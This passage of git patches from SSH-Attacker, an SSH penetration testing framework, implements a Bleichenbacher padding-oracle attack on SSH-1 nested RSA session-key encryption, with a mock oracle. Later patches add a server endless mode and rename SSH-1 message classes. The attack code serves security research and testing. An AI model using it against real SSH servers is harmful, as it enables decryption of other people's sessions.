s.add(BigInteger.ONE), ciphertext, innerPublicKey, outerPublicKey); + } else if (M.size() == 1) { + BigInteger a = M.get(0).lower; + BigInteger b = M.get(0).upper; + if (a.equals(b)) { + byte[] result = new byte[innerK]; + byte[] aBytes = a.toByteArray(); + System.arraycopy(aBytes, 0, result, innerK - aBytes.length, aBytes.length); + return result; + } + s = find_s_in_range_nested(a, b, s, ciphertext, innerPublicKey, outerPublicKey); + } + M = updateInterval(M, s, innerPublicKey); + } + } + + /** + * The Bleichenbacher-Attacke for single-encrypted ciphertexts + * + * @param ciphertext The ciphertext, which should be decrypted + * @param publicKey The known public key, which was used to encrypt the ciphertext + * @return the decrypted ciphertext, whith a valid PKCS#1 Padding + */ + private byte[] bleichenbacher(byte[] ciphertext, CustomRsaPublicKey publicKey) { + int bitsize = publicKey.getModulus().bitLength(); + int k = bitsize / 8; + + LOGGER.debug( + "bitsize: {}\nk: {}\nB: {}\n2B: {}\n3B: {}\n3B - 1: {}\nCiphertext: {}", + bitsize, + k, + B.toString(16), + two_B.toString(16), + three_B.toString(16), + three_B_sub_one.toString(16), + bytesToHex(ciphertext)); + + /* + LOGGER.debug("bitsize: " + bitsize); + LOGGER.debug("k: " + k); + LOGGER.debug("B: " + B.toString(16)); + LOGGER.debug("2B: " + two_B.toString(16)); + LOGGER.debug("3B: " + three_B.toString(16)); + LOGGER.debug("3B - 1: " + three_B_sub_one.toString(16)); + LOGGER.debug("Ciphertext: " + bytesToHex(ciphertext));*/ + + List M = new ArrayList<>(); + M.add(new Interval(two_B, three_B_sub_one)); + LOGGER.debug( + "M lower: {} M upper: {}", + M.get(0).lower.toString(16), + M.get(0).upper.toString(16)); + + BigInteger s = + find_smallest_s(ceil(publicKey.getModulus(), three_B), ciphertext, publicKey); + + LOGGER.debug( + "found s, initial updating M lower: {} M upper: {}", + M.get(0).lower.toString(16), + M.get(0).upper.toString(16)); + + M = updateInterval(M, s, publicKey); + LOGGER.debug("Length: {} M: {}", M.size(), M.toString()); + + while (true) { + if (M.size() >= 2) { + s = find_smallest_s(s.add(BigInteger.ONE), ciphertext, publicKey); + } else if (M.size() == 1) { + BigInteger a = M.get(0).lower; + BigInteger b = M.get(0).upper; + if (a.equals(b)) { + byte[] result = a.toByteArray(); + return result; + } + s = find_s_in_range(a, b, s, ciphertext, publicKey); + } + M = updateInterval(M, s, publicKey); + } + } + + /** + * A helper function to create a hex-string from bytes + * + * @param bytes The bytes, which should be returned as hex-string + * @return The hex-string for the given Bytes + */ + private String bytesToHex(byte[] bytes) { + StringBuilder result = new StringBuilder(); + for (byte b : bytes) { + result.append(String.format("%02x", b)); + } + return result.toString(); + } + + /** + * A helper function to remove a PKCS#1-encoded-Padding + * + * @param encodedPayload The PKCS#1-encoded Payload + * @return The raw payload, without padding and header. + */ + private byte[] pkcs1Decode(byte[] encodedPayload) { + /* + This function removes the header and the padding from the PKCS#1 v1.5 + Encoding Scheme + */ + encodedPayload = Arrays.copyOfRange(encodedPayload, 2, encodedPayload.length); + + int idx = 0; + for (int i = 0; i < encodedPayload.length; i++) { + if (encodedPayload[i] == 0x00) { + idx = i; + break; + } + } + + return Arrays.copyOfRange(encodedPayload, idx + 1, encodedPayload.length); + } + + /** + * A helper function to encrypt a given BB-Attempt with a PCKS#1-Padding and a RSA encryption + * + * @param attempt The "plain" BB-Attempt, which should be encrypted + * @param encryptionKey The encryption-Key for the attempt + * @return + */ + private BigInteger encryptBigInt(BigInteger attempt, CustomRsaPublicKey encryptionKey) { + try { + Cipher javaCipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + + javaCipher.init(Cipher.ENCRYPT_MODE, encryptionKey); + + return new BigInteger(javaCipher.doFinal(attempt.toByteArray())); + + } catch (InvalidKeyException + | IllegalBlockSizeException + | BadPaddingException + | NoSuchPaddingException + | NoSuchAlgorithmException e) { + throw new RuntimeException(e); + } + } +} diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java index 686f3320a..865714066 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Pkcs1Attack.java @@ -90,6 +90,22 @@ protected boolean queryOracle(BigInteger message, BigInteger si) { return oracle.checkPKCSConformity(msg); } + /** + * @param message Message to query the oracle with + * @param inner True, if the query is for the inner encryption + * @return The return value of the oracle (true/false), the result belongs to the inner / outer + * encryption give with the parameter inner + */ + protected boolean queryOracle(BigInteger message, boolean inner) { + byte[] msg = ArrayConverter.bigIntegerToByteArray(message, blockSize, true); + boolean[] results = oracle.checkDoublePKCSConformity(msg); + if (inner) { + return results[1]; + } else { + return results[0]; + } + } + /** * @param message Message to query the oracle with * @return The return value of the oracle (true/false) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Pkcs1Oracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Pkcs1Oracle.java index 69358f95c..46bd4b89a 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Pkcs1Oracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Pkcs1Oracle.java @@ -62,6 +62,10 @@ public PublicKey getPublicKey() { */ public abstract boolean checkPKCSConformity(final byte[] msg) throws OracleException; + public boolean[] checkDoublePKCSConformity(final byte[] msg) throws OracleException { + return new boolean[] {false, false}; + } + /** * Returns true if the oracle is a plaintext oracle (does not decrypt the data received) * diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java new file mode 100644 index 000000000..18d825423 --- /dev/null +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java @@ -0,0 +1,145 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.attacks.pkcs1.oracles; + +import de.rub.nds.sshattacker.attacks.pkcs1.OracleException; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.tlsattacker.util.MathHelper; +import java.security.InvalidKeyException; +import java.security.KeyFactory; +import java.security.NoSuchAlgorithmException; +import java.security.interfaces.RSAPrivateKey; +import java.security.interfaces.RSAPublicKey; +import java.security.spec.InvalidKeySpecException; +import java.security.spec.RSAPrivateKeySpec; +import javax.crypto.BadPaddingException; +import javax.crypto.Cipher; +import javax.crypto.IllegalBlockSizeException; +import javax.crypto.NoSuchPaddingException; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +/** + * A mock Manger oracle that used a private key to decrypt the messages and answers if the message + * is PKCS1 conform + */ +public class Ssh1MockOracle extends Pkcs1Oracle { + + private static final Logger LOGGER = LogManager.getLogger(); + + private final RSAPrivateKey hostPrivateKey; + private final RSAPrivateKey serverPrivateKey; + private final RSAPublicKey hostPublicKey; + private final RSAPublicKey serverPublicKey; + private final Cipher cipher; + + public Ssh1MockOracle( + CustomRsaPublicKey hostPublicKey, + CustomRsaPrivateKey hostPrivateKey, + CustomRsaPublicKey serverPublicKey, + CustomRsaPrivateKey serverPrivateKey) + throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException { + this.hostPublicKey = hostPublicKey; + this.hostPrivateKey = hostPrivateKey; + this.serverPublicKey = serverPublicKey; + this.serverPrivateKey = serverPrivateKey; + this.blockSize = MathHelper.intCeilDiv(hostPublicKey.getModulus().bitLength(), Byte.SIZE); + + // Init cipher + this.cipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + } + + int counter = 0; + + /** + * Check the given content for PKCS-Conformity + * + * @param msg Encrypted message to check for conformity + * @return true, if conforming, false if not. + * @throws OracleException + */ + @Override + public boolean checkPKCSConformity(byte[] msg) throws OracleException { + return checkDoublePKCSConformity(msg)[0]; + } + + /** + * Check the given content for PKCS-Conformity which double encryption. + * + * @param msg Encrypted message to check for conformity + * @return An Array for both encryption, the first entry for the outer-encryption, the second + * for the inner encryption + */ + @Override + public boolean[] checkDoublePKCSConformity(byte[] msg) { + + boolean[] oracleResult = new boolean[] {false, false}; + counter++; + if (counter % 500 == 0) { + LOGGER.info("[{}] Tries", counter); + } + if (isPlaintextOracle) { + return new boolean[] {true, true}; + } else { + + try { + KeyFactory factory = KeyFactory.getInstance("RSA"); + RSAPrivateKey hostPriv = + (RSAPrivateKey) + factory.generatePrivate( + new RSAPrivateKeySpec( + hostPrivateKey.getModulus(), + hostPrivateKey.getPrivateExponent())); + RSAPrivateKey serverPriv = + (RSAPrivateKey) + factory.generatePrivate( + new RSAPrivateKeySpec( + serverPrivateKey.getModulus(), + serverPrivateKey.getPrivateExponent())); + + byte[] firstStep = null; + byte[] secondStep = null; + + if (hostPublicKey.getModulus().bitLength() + > serverPublicKey.getModulus().bitLength()) { + this.cipher.init(Cipher.DECRYPT_MODE, hostPriv); + firstStep = cipher.doFinal(msg); + + oracleResult[0] = true; + + this.cipher.init(Cipher.DECRYPT_MODE, serverPriv); + secondStep = cipher.doFinal(firstStep); + + oracleResult[1] = true; + + } else { + this.cipher.init(Cipher.DECRYPT_MODE, serverPriv); + firstStep = cipher.doFinal(msg); + + oracleResult[0] = true; + + this.cipher.init(Cipher.DECRYPT_MODE, hostPriv); + secondStep = cipher.doFinal(firstStep); + + oracleResult[1] = true; + } + + LOGGER.debug(secondStep); + + return oracleResult; + + } catch (IllegalBlockSizeException | BadPaddingException e) { + // LOGGER.error("Decryption error", e); + return oracleResult; + } catch (InvalidKeyException | NoSuchAlgorithmException | InvalidKeySpecException e) { + throw new RuntimeException(e); + } + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java index e6304b42a..9472c9fb6 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java @@ -18,6 +18,9 @@ public class ServerDelegate extends Delegate { @Parameter(names = "-port", required = true, description = "ServerPort") protected Integer port = null; + @Parameter(names = "-endless", description = "EndlessMode") + protected Boolean endless = null; + public ServerDelegate() {} public Integer getPort() { @@ -28,6 +31,14 @@ public void setPort(int port) { this.port = port; } + public Boolean getEndless() { + return endless; + } + + public void setEndless(Boolean endless) { + this.endless = endless; + } + @Override public void applyDelegate(Config config) { @@ -41,6 +52,12 @@ public void applyDelegate(Config config) { inboundConnection = new InboundConnection(parsedPort); config.setDefaultServerConnection(inboundConnection); } + + if (endless) { + LOGGER.debug("ENDLESS"); + config.setWorkflowExecutorShouldClose(false); + config.setStopActionsAfterDisconnect(false); + } } private int parsePort(Integer port) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java index 358a91024..c5a5ce8e0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java @@ -162,6 +162,8 @@ private byte[] decryptSessionKey(ClientSessionKeyMessage message) throws CryptoE sessionKey = Arrays.copyOfRange(sessionKey, 1, sessionKey.length); } + byte[] second_sessionkey = sessionKey.clone(); + CustomRsaPrivateKey hostPrivateKey; CustomRsaPrivateKey serverPrivatKey; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java index d736e05fb..97cdc197b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java @@ -9,7 +9,7 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.string.ModifiableString; -import de.rub.nds.sshattacker.core.constants.MessageIdConstant; +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.VersionExchangeMessageSSHV1Handler; @@ -27,11 +27,11 @@ public class VersionExchangeMessageSSHV1 extends ProtocolMessage Date: Sun, 8 Oct 2023 12:51:10 +0200 Subject: [PATCH 087/176] Add Server Endless mode --- .../nds/sshattacker/core/config/Config.java | 10 +++++++ .../core/config/delegate/ServerDelegate.java | 1 + .../sshattacker/server/main/SshServer.java | 30 ++++++++++++++----- 3 files changed, 33 insertions(+), 8 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index b70d6b20c..7266dc481 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -81,6 +81,8 @@ public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { private Boolean resetClientSourcePort = true; + private Boolean endless = false; + // region VersionExchange /** Client protocol and software version string starting with the SSH version (SSH-2.0-...) */ private String clientVersion; @@ -1815,4 +1817,12 @@ public List getChosenProtocolFlags() { public void setChosenProtocolFlags(List chosenProtocolFlags) { this.chosenProtocolFlags = chosenProtocolFlags; } + + public Boolean getEndless() { + return endless; + } + + public void setEndless(Boolean endless) { + this.endless = endless; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java index 9472c9fb6..5ee25c838 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java @@ -57,6 +57,7 @@ public void applyDelegate(Config config) { LOGGER.debug("ENDLESS"); config.setWorkflowExecutorShouldClose(false); config.setStopActionsAfterDisconnect(false); + config.setEndless(true); } } diff --git a/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/main/SshServer.java b/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/main/SshServer.java index 328cc3e87..0669d4271 100644 --- a/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/main/SshServer.java +++ b/SSH-Server/src/main/java/de/rub/nds/sshattacker/server/main/SshServer.java @@ -16,6 +16,7 @@ import de.rub.nds.sshattacker.core.workflow.DefaultWorkflowExecutor; import de.rub.nds.sshattacker.core.workflow.WorkflowExecutor; import de.rub.nds.sshattacker.server.config.ServerCommandConfig; +import java.io.IOException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -33,14 +34,19 @@ public static void main(String[] args) { return; } - try { - Config sshConfig = config.createConfig(); - SshServer server = new SshServer(); - server.startSshServer(sshConfig); - } catch (Exception e) { - LOGGER.error( - "Encountered an uncaught exception, aborting. See debug for more info.", e); - } + Config sshConfig = config.createConfig(); + + do { + try { + + SshServer server = new SshServer(); + server.startSshServer(sshConfig); + } catch (Exception e) { + LOGGER.error( + "Encountered an uncaught exception, aborting. See debug for more info.", + e); + } + } while (sshConfig.getEndless()); } catch (ParameterException e) { LOGGER.error("Could not parse provided parameters: " + e.getLocalizedMessage()); LOGGER.debug(e); @@ -58,5 +64,13 @@ public void startSshServer(Config config) { "The SSH protocol flow was not executed completely, follow the debug messages for more information."); LOGGER.debug(e.getLocalizedMessage(), e); } + + try { + if (!state.getSshContext().getTransportHandler().isClosed()) { + state.getSshContext().getTransportHandler().closeConnection(); + } + } catch (IOException e) { + throw new RuntimeException(e); + } } } From c67b50cef50e63602b64b61682adaf8d77ec13bc Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 15 Oct 2023 14:32:10 +0200 Subject: [PATCH 088/176] Correcting SSHv1 Success Message (setting unique name, because the xml-handling will fail otherwise) --- .../core/layer/impl/SSH1Layer.java | 5 +- .../core/protocol/common/ProtocolMessage.java | 6 --- .../handler/DisconnectMessageHandler.java | 7 +-- .../ssh1/handler/FailureMessageHandler.java | 29 +++++++++++ .../ssh1/handler/SuccessMessageHandler.java | 6 +-- ...essage.java => DisconnectMessageSSH1.java} | 16 +++--- .../ssh1/message/FailureMessageSSH1.java | 52 +++++++++++++++++++ ...ssMessage.java => SuccessMessageSSH1.java} | 8 +-- .../ssh1/parser/DisconnectMessageParser.java | 14 ++--- .../ssh1/parser/FailureMessageParser.java | 33 ++++++++++++ .../ssh1/parser/SuccessMessageParser.java | 8 +-- .../DisconnectMessagePreparator.java | 11 ++-- .../preparator/FailureMessagePreparator.java | 30 +++++++++++ .../preparator/SuccessMessagePreparator.java | 6 +-- .../DisconnectMessageSerializier.java | 21 ++++++-- .../serializer/FailureMessageSerializier.java | 26 ++++++++++ .../serializer/SuccessMessageSerializier.java | 6 +-- .../core/workflow/WorkflowExecutor.java | 4 +- .../core/workflow/action/MessageAction.java | 9 ++-- .../core/workflow/action/ReceiveAction.java | 9 ++-- 20 files changed, 240 insertions(+), 66 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/FailureMessageHandler.java rename SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/{DisconnectMessage.java => DisconnectMessageSSH1.java} (76%) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/FailureMessageSSH1.java rename SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/{SuccessMessage.java => SuccessMessageSSH1.java} (80%) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/FailureMessageParser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/FailureMessagePreparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/FailureMessageSerializier.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 847ab5649..9d3f1f954 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -313,17 +313,18 @@ private void readSessionKeyData(AbstractPacket packet) { } private void readDisconnectData(AbstractPacket packet) { - DisconnectMessage message = new DisconnectMessage(); + DisconnectMessageSSH1 message = new DisconnectMessageSSH1(); HintedInputStream temp_stream; temp_stream = new HintedInputStreamAdapterStream( null, new ByteArrayInputStream(packet.getPayload().getValue())); readContainerFromStream(message, context, temp_stream); + } private void readSuccessMessage(AbstractPacket packet) { - SuccessMessage message = new SuccessMessage(); + SuccessMessageSSH1 message = new SuccessMessageSSH1(); HintedInputStream temp_stream; temp_stream = diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java index 5888ec265..902654b29 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessage.java @@ -130,12 +130,6 @@ public void setAdjustContext(Boolean adjustContext) { @Override public abstract ProtocolMessageHandler getHandler(SshContext sshContext); - // @Override - // public abstract ProtocolMessageParser getParser(byte[] array); - - // @Override - // public abstract ProtocolMessageParser getParser(byte[] array, int startPosition); - @Override public abstract ProtocolMessagePreparator getPreparator(SshContext sshContext); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DisconnectMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DisconnectMessageHandler.java index 07bb967d1..e6734b3db 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DisconnectMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/DisconnectMessageHandler.java @@ -9,11 +9,11 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class DisconnectMessageHandler extends SshMessageHandler { +public class DisconnectMessageHandler extends SshMessageHandler { private static final Logger LOGGER = LogManager.getLogger(); @@ -27,9 +27,10 @@ public DisconnectMessageHandler(SshContext context) { }*/ @Override - public void adjustContext(DisconnectMessage message) { + public void adjustContext(DisconnectMessageSSH1 message) { LOGGER.warn( "Recieved a Disconnect Message, Reason: {}", message.getDisconnectReason().getValue()); + sshContext.setDisconnectMessageReceived(true); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/FailureMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/FailureMessageHandler.java new file mode 100644 index 000000000..3517d9ece --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/FailureMessageHandler.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.FailureMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class FailureMessageHandler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public FailureMessageHandler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(FailureMessageSSH1 message) { + LOGGER.info("Received a Success Message"); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/SuccessMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/SuccessMessageHandler.java index 454d7802f..df2ba6720 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/SuccessMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/SuccessMessageHandler.java @@ -9,11 +9,11 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class SuccessMessageHandler extends SshMessageHandler { +public class SuccessMessageHandler extends SshMessageHandler { private static final Logger LOGGER = LogManager.getLogger(); @@ -27,7 +27,7 @@ public SuccessMessageHandler(SshContext context) { }*/ @Override - public void adjustContext(SuccessMessage message) { + public void adjustContext(SuccessMessageSSH1 message) { LOGGER.info("Recived a Success Message"); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessageSSH1.java similarity index 76% rename from SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessage.java rename to SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessageSSH1.java index 0af4537be..b7a6a2795 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DisconnectMessageSSH1.java @@ -9,7 +9,6 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.string.ModifiableString; -import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; @@ -21,7 +20,7 @@ import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.DisconnectMessageSerializier; import java.io.InputStream; -public class DisconnectMessage extends SshMessage { +public class DisconnectMessageSSH1 extends SshMessage { private ModifiableString disconnectReason; @@ -44,24 +43,23 @@ public DisconnectMessageHandler getHandler(SshContext context) { } @Override - public SshMessageParser getParser(SshContext context, InputStream stream) { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + public SshMessageParser getParser( + SshContext context, InputStream stream) { return new DisconnectMessageParser(context, stream); } @Override - public SshMessagePreparator getPreparator(SshContext context) { - HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); - return new DisconnectMessagePreparator(context.getChooser(), this, kex.getCombiner()); + public SshMessagePreparator getPreparator(SshContext context) { + return new DisconnectMessagePreparator(context.getChooser(), this); } @Override - public SshMessageSerializer getSerializer(SshContext context) { + public SshMessageSerializer getSerializer(SshContext context) { return new DisconnectMessageSerializier(this); } @Override public String toShortString() { - return "CMSG_SESSION_KEY"; + return "SSH_DISCONNECT"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/FailureMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/FailureMessageSSH1.java new file mode 100644 index 000000000..bec839d48 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/FailureMessageSSH1.java @@ -0,0 +1,52 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.FailureMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.SuccessMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.FailureMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.SuccessMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.FailureMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.SuccessMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.FailureMessageSerializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.SuccessMessageSerializier; + +import java.io.InputStream; + +public class FailureMessageSSH1 extends SshMessage { + + @Override + public FailureMessageHandler getHandler(SshContext context) { + return new FailureMessageHandler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + return new FailureMessageParser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new FailureMessagePreparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new FailureMessageSerializier(this); + } + + @Override + public String toShortString() { + return "SSH_SMSG_FAILURE"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/SuccessMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/SuccessMessageSSH1.java similarity index 80% rename from SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/SuccessMessage.java rename to SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/SuccessMessageSSH1.java index 74adfd06a..5963514d5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/SuccessMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/SuccessMessageSSH1.java @@ -18,7 +18,7 @@ import 